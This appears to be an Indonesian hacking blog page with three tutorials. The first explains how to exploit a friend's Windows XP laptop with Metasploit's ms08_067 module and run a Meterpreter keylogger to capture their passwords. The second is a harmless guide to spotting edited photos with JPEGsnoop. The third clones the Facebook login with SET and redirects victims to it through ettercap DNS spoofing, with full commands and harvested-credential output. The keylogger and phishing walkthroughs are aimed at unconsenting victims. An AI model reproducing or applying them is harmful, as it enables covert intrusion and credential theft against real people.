Saturday, November 5, 2011

Pasang Keylogger Tanpa Nyentuh Komputer Tujuan

Pasang Keylogger Tanpa Nyentuh Target
Iseng-iseng again:perimaho:mengapa judulnya kayak gini, iyah betul judulnya sesuai kok sama kenyataannya,,yang biasanya ente kalo mau ngerjain temen buat ngerekam keyboard target pake keyloger dengan harapan si korban masukin email dan lain sebagainya.. Ente mondar mandir berkali kali kekomputer target buat naro keylogger dengan berbagai macam alesan,,entah numpang mindahin file or apalah buat naro sebuah keylogger aja,,alesan yang pertama bos minjem laptop luh bos buat mindahin data-data, abis itu seminggu kemudian balik lagi pake alesan bos data-data w kemaren ketinggalan dilaptop luh. Gw minjem lagi dong dengan harapan password email or facebook temennya udah kecantol di jebakan keylogger miliknya,,tapi tutorial kali ini, gak perlu repot2 kok, gak perlu mondar mandir dua kali..Tutorial kali ini kita exploit rekaman keyboard tanpa menyentuh laptop korbannya...dengan modal kita tau ipaddress korban aja udah beres,,Linux gituh Lhhhooooooo...

OK deh langsung aja, tanpa basa basi..

Peralatannya adalah :

Angry IP Scanner (Buat scanning ipaddress)

Nmap (Buat nyecan Port2 yg kebuka n nyecen OS korban sekalian)

Metasploit (Sangat penting buat exploitnya)

1. Pertama buka angryipscanner, pilih netmasknya yg 24 ajee,,pokoknya disesuain aja sama lokasinya dimana,,hahhaha,,kalo sekedar hostpot area area doang yg model model kayak di mol mol mah 24 ajeee...lalu liat ipaddress kita dilaptop kita..dan lakukan scanning dari 0 s/d 255, maka akan muncul gambar kayak gini :

[Image: 162750_1401465651775_1686336794_811864_4285701_n.jpg]

nah gambar diatas itu yg warna biru berati komputernya lagi idup alias lagi nyala.

2. Buka nmap dan lakukan scanning port dan OS korban dengan perintah sudo nmap -O ipkorban, seperti gambar berikut:
[Image: 148101_1401466691801_1686336794_811866_4956455_n.jpg]



liat deh ituhh,,ternyata doi pake windows XP,,hehhehe,,hajar bleeeehhhhhh....sampe keakar2nya bikin intall ulang dalem hitungan detik...Ouuppppsss jangan dungggsss, kan ini tutorialnya tentang ngerekam keyboard buat dapetin password,,hhehheh,,,Oiya yaaaa...lanjuttt blleeehhh..

3. Mulailah exploit, buka applikasinya msfgui,,tekan keyboard Alt+F2 dan ketik ?msfgui? setelah kebuka dan Start, pilih ?ms08_067_netapi? di Exploit>windows>smb> , seperti gambar berikut ini:

[Image: 148893_1401467211814_1686336794_811869_3285451_n.jpg]

4. Maka akan keluar jendela pilihan OS targetnya, pilihlah ?Automatic Targeting?, seperti gambar berikut ini:

[Image: 76876_1401468051835_1686336794_811872_7263103_n.jpg]

5. Lalu scrool kebawah dan pilih ?Meterpreter>bind_tcp? , seperti gambar berikut ini:

[Image: 154307_1401469531872_1686336794_811874_6222778_n.jpg]

6. Lalu scrool kebawah lagi dan masukan ipaddress target di kolom ?RHOST? , seperti gambar berikut ini:

[Image: 162941_1401470211889_1686336794_811876_4124129_n.jpg]

Lalu scrool ke paling bawah ada tombol, Exploit, tekan aja ituh,,,

7. Maka akan keluar jendela seperti ini di tab ?Session?, seperti gambar dibawah ini:
[Image: 76083_1401470611899_1686336794_811877_2465812_n.jpg]
8. Lalu klik kanan itu dan pilih Monitor>Start KeyLogger, seperti gambar dibawah ini:
[Image: 150267_1401470891906_1686336794_811878_1152151_n.jpg]

9. Maka akan keluar path tempat penyimpanan log nya berupa format ?txt? dikomputer kita, seperti gambar berikut ini:

[Image: 156342_1401471091911_1686336794_811879_6514333_n.jpg]

coba perhatikan yg Keystrokes being saved to bla bla bla,,itu adalah nama path lokasi penyimpanan lognya dikomputer pinguin kita. dan liat bacaan Recording,,itu berati ketukan keyboard korban sudah mulai di rekam oleh metasploit kita..hhehehe..Saatnya kita tungguin ajaaa dah,,setelah lama, kita tunggu, n udah gak sabar, setelah beberapa menit kita buka ajjeee tuh filenya, seperti gambar berikut ini:

[Image: 162636_1401471851930_1686336794_811882_7988551_n.jpg]

10. Udah gak sabar nih, langsung aja buka,,lalu lakukan searching dengan menekan tombol Ctrl+F dengan memasukkan kata2 kunci yg biasanya bau bau enak, seperti yahoo.com, yahoo.co.id, gmail.com , ymail.com, com, dll, maka akan keluar Insya Allah kayak gini broo:
[Image: 148098_1401489772378_1686336794_811897_3877593_n.jpg]

Maaf yaa ga bisa kasih bahan2nya. di mbah google banyak kok wakaka . kalo udah ada bahannya jangan lupa di share Ganteng

Semoga berguna Bahagia

Created By iroell Hnc
READ MORE - Pasang Keylogger Tanpa Nyentuh Komputer Tujuan

Cara Mengetahui Foto Asli Atau Palsu

Tools yang dibutuhkan

bisa di download disini:

http://jpegsnoop.en.softonic.com/

Oke kita lanjutkan, coba kita analisis Foto

[Image: 5557514600_e22b91ae1d_m.jpg]

foto A

[Image: 5556929441_c70c7c6b4d_m.jpg]

foto B

Yang manakah yang asli dari foto tersebut?

Kita tinggal buka saja JPEGSNOOP:

1. FILE => OPEN IMAGE, kemudian cari foto yang akan kita analisis. Berikut adalah informasi dari Foto A:
[Image: 5557437568_3ca62e4113_z.jpg]

2. Kemudian buka juga Foto B:
[Image: 5556853599_cfe47b6564_z.jpg]

Inilah proses yang terjadi ketika Photo B saya edit:
[Image: 5556853217_efe5713925_z.jpg]

Selama informasi media masih ada dalam database JPEGSNOOP, kesimpulannya adalah :

1. Kita dapat mengetahui foto asli apa palsu.
2. Kita dapat mengetahui tanggal di editnya foto.
3. Kita dapat mengetahui media apa yang digunakan untuk melakukan pengeditan.
4. Dll (Kepanjangan – Dicoba sendiri aja JPEGSNOOPnya ya) :) :) :)

Cukup mudah bukan? Ternyata Foto Yang Palsu adalah Foto B, sedangkan Foto Yang Asli adalah Foto A.

JPEGSNOOP juga telah menyediakan Result Assessment di bagian paling bawah.

Tambahan: Silakan Digunakan Apabila Ada Artis / Media Online / Media Cetak / Teman Anda Yang Menanyakan Foto Asli Apa Palsu :)

Created By BlaCk CyBeR a.k.a Vean
READ MORE - Cara Mengetahui Foto Asli Atau Palsu

Phishing dengan SET dan Ettercap-NG

Hallo sobat, beberapa hari yang lalu teman saya red-dragon pernah menjelaskan mengenai prerouting yang dijelaskan di sini untuk melakukan exploitasi. Kali ini teman saya red-dragon akan mencoba memanfaatkan dns_spoof yang terdapat dalam plugin ettercap-ng untuk melakukan phishing.

Hal pertama yang harus dilakukan adalah mengumpulkan informasi. Hal ini pernah teman saya red-dragon jelaskan di sini
Preparation:
  • Ettercap-NG
  • Social Engineering Toolkit
Note:
  • Matikan web server apache dengan menggunakan perintah:
root@bt5r1:~# /etc/init.d/apache2 stop
Walktrough:




root@bt5r1:~# nmap 172.16.129.1/24

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-25 14:17 WIT
Nmap scan report for 172.16.129.1
Host is up (0.0000070s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE
902/tcp open  iss-realsecure

Nmap scan report for 172.16.129.129
Host is up (0.00070s latency).
Not shown: 993 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
554/tcp   open  rtsp
2869/tcp  open  icslap
5357/tcp  open  wsdapi
10243/tcp open  unknown
MAC Address: 00:0C:29:71:E6:CF (VMware)

Nmap scan report for 172.16.129.254
Host is up (0.000066s latency).
All 1000 scanned ports on 172.16.129.254 are filtered
MAC Address: 00:50:56:EE:EB:39 (VMware)

Nmap done: 256 IP addresses (3 hosts up) scanned in 10.88 seconds
Screenshot:
Setelah mengetahui targetnya, maka kita siapkan web phishing-nya dengan menggunakan SET. Berikut modulnya:
root@bt5r1:~# cd /pentest/exploits/set/
root@bt5r1:/pentest/exploits/set# ./set


  [---]       The Social-Engineer Toolkit (SET)          [---]
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]                 Version: 2.1                     [---]
  [---]              Codename: 'Rebirth'                 [---]
  [---]       Report bugs: davek@social-engineer.org     [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]        Homepage: http://www.secmaniac.com        [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.

     Join us on irc.freenode.net in channel #setoolkit

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Metasploit Framework
   5) Update the Social-Engineer Toolkit
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1

  [---]       The Social-Engineer Toolkit (SET)          [---]
  [---]        Created by: David Kennedy (ReL1K)         [---]
  [---]        Development Team: JR DePre (pr1me)        [---]
  [---]        Development Team: Joey Furr (j0fer)       [---]
  [---]                 Version: 2.1                     [---]
  [---]              Codename: 'Rebirth'                 [---]
  [---]       Report bugs: davek@social-engineer.org     [---]
  [---]         Follow me on Twitter: dave_rel1k         [---]
  [---]        Homepage: http://www.secmaniac.com        [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..
    
    DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.

     Join us on irc.freenode.net in channel #setoolkit

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) Third Party Modules

  99) Return back to the main menu.

set> 2

 The Web Attack module is  a unique way of utilizing multiple web-based attacks
 in order to compromise the intended victim.

 The Java Applet Attack method will spoof a Java Certificate and deliver a 
 metasploit based payload. Uses a customized java applet created by Thomas
 Werth to deliver the payload.

 The Metasploit Browser Exploit method will utilize select Metasploit
 browser exploits through an iframe and deliver a Metasploit payload.
[snip...]

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Create or import a CodeSigning Certificate

  99) Return to Main Menu

set:webattack>6

 The first method will allow SET to import a list of pre-defined web 
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2

Setelah ini maka web phishing hampir selesai, yang harus kita lakukan adalah menentukan apa yang ingin kita curi dari korban. Misalkan ingin mencuri akun facebook, maka modulnya seperti berikut:
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.facebook.com

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] I have read the above message. [*]

Press {return} to continue.

[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
Dengan begini web phishing telah siap. Kita hanya tinggal menunggu korban mengklik link di atas yang tercetak warna ungu, yaitu: https://login.facebook.com/login.php atau bisa juga korban harus menuju link kita yaitu: 172.16.129.1. Hmmm, rasanya sulit sekali jika kita harus menunggu korban menuju link itu. Kita gunakan DNS spoof, agar korban selalu menuju IP kita ketika dia akan mengakses www.facebook.com. Modul:
root@bt5r1:~# nano /usr/share/ettercap/etter.dns



Lalu tambahkan baris ini di bawah:
www.facebook.com A 172.16.129.1

Ini akan membuat korban selalu di-spoof ke 172.16.129.1 ketika ingin mengakses www.facebook.com. Setelah itu, lakukan modul ini untuk mengaktifkan dns_spoof:
root@bt5r1:~# ettercap -i vmnet8 -T -q -P dns_spoof // //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on vmnet8... (Ethernet)

vmnet8 -> 00:50:56:C0:00:08      172.16.129.1     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

2 hosts added to the hosts list...
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

Screenshot:
Setelah ini maka persiapan sudah 100%. Kita hanya tinggal menunggu korban mengakses halaman kita. Lihat screenshot ketika Windows tidak spoofed saat mengakses Google:
Dan lihat ketika korban spoofed ketika mengakses www.facebook.com ke halaman phishing SET. Berikut report dari ettercap:
dns_spoof: [www.facebook.com] spoofed to [172.16.129.1]
Screenshot:
Lihat halaman phishing yang dibuat oleh SET yang sama persis dengan yang sebenarnya, hanya saja URL-nya berbeda:
Dan lihat ketika user memasukan Username dan Sandinya:
Report dari SET:
[*] Information will be displayed to you as it arrives below:
172.16.129.129 - - [25/Oct/2011 14:25:12] "GET / HTTP/1.1" 200 -
10.76.80.63 - - [25/Oct/2011 14:26:24] "GET /index2.html HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: charset_test=€,´,€,´,水,Д,Є
PARAM: lsd=
PARAM: return_session=0
PARAM: legacy_return=1
PARAM: display=
PARAM: session_key_only=0
PARAM: trynum=1
PARAM: charset_test=€,´,€,´,水,Д,Є
PARAM: lsd=
POSSIBLE USERNAME FIELD FOUND: email=doubledragon
POSSIBLE PASSWORD FIELD FOUND: pass=doubledragon
PARAM: persistent=1
PARAM: default_persistent=0
POSSIBLE USERNAME FIELD FOUND: login=Masuk
[*] WHEN YOUR FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


^C[*] File exported to reports/2011-10-25 14:28:14.508234.html for your reading pleasure...
[*] File in XML format exported to reports/2011-10-25 14:28:14.508234.xml for your reading pleasure...

Press {return} to return to the menu.

Screenshot:
Sekian tutorial kali ini, semoga bermanfaat =))

Created By red-dragon
READ MORE - Phishing dengan SET dan Ettercap-NG
Template by : mhiman@ hacker-newbie.org